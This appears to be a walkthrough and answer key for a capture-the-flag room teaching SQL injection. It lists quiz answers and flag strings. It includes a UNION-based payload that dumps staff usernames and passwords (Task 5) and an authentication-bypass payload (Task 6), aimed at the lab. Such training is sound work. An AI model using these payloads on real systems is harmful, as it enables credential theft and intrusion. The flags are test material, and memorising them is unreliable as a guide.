SQL Injection

(Learn about SQL injection from Here)

Task 1 - Brief

Q1. What does SQL stand for?

Answer - Structured Query Language

Task 2 - What is a Database?

Q2. What is the acronym for the software that controls a database?

Answer - DBMS

Q3. What is the name of the grid-like structure which holds the data?

Answer - table

Task 3 - What is SQL?

Q1. What SQL statement is used to retrieve data?

Answer - SELECT

Q2. What SQL clause can be used to retrieve data from multiple tables?

Answer - UNION

Q3. What SQL statement is used to add data?

Answer - INSERT

Task 4 - What is SQL Injection?

Q1. What character signifies the end of an SQL query?

Answer - ;

Task 5 - In-Band SQLi

Q1. What is the flag after completing level 1?

Add the following query in the url -
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

It will give you the credentials.Login into the martin's account and get the flag.

Answer - THM{SQL_INJECTION_3840}

Task 6 - Blind SQLi - Authentication Bypass

Q1. What is the flag after completing level two? (and moving to level 3)

Add admin in name and the payload 0' or 1=1-- and submit to get -

click on Level 3 to get the flag -

Answer - THM{SQL_INJECTION_9581}

Task 7 - Blind SQLi - Boolean Based

Q1. What is the flag after completing level three?

Answer - THM{SQL_INJECTION_1093}

Task 8 - Blind SQLi - Time Based

Q1. What is the final flag after completing level four?

Answer - THM{SQL_INJECTION_MASTER}

Task 9 - Out-of-Band SQLi

Q1. Name a protocol beginning with D that can be used to exfiltrate data from a database.

Answer - DNS

Task 9 - Remediation

Q1. Name a method of protecting yourself from an SQL Injection exploit.

Answer - Prepared Statements